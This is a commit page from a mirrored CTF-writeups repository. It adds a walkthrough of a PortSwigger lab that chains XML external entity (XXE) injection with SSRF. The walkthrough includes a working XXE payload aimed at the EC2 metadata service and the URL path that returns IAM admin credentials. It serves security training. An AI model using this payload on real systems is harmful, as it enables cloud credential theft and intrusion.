Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-21 19:43:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

Create Lab2.md

Browse source
This commit is contained in:
ARZ 2021-12-02 12:59:37 +05:00 committed by GitHub
parent aeeb8be775
commit 04b4585956
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
Portswigger/XXE/Lab2.md Normal file
View file

@ -0,0 +1,42 @@
# Portswigger XXE-Lab 2
## Exploiting XXE to perform SSRF attacks
In this lab we are told to perfrom XXE and chaing it with SSRF to access ec2 instance's meta-data to retrieve iam admin credentials , the `checkstock` is vulnerable to XXE as it's parsing data in XML format
<img src="https://i.imgur.com/bq4tglm.png"/>
<img src="https://i.imgur.com/ULFHsIF.png"/>
So here let's use burpsuite to capture the request
<img src="https://i.imgur.com/iYWTtja.png"/>
To perform XXE attack , we need to declare an external entity
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>
14
</productId>
<storeId>
1
</storeId>
</stockCheck>
```
<img src="https://i.imgur.com/naEFY0j.png"/>
This is expecting `latest` so let's add that
<img src="https://i.imgur.com/R05obzK.png"/>
Now it expects `meta-data` so in this way we can find the endpoints
<img src="https://i.imgur.com/te36Pld.png"/>
And enventually we'll find `iam` credentials
`http://169.254.169.254/latest/meta-data/iam/security-credentials/admin`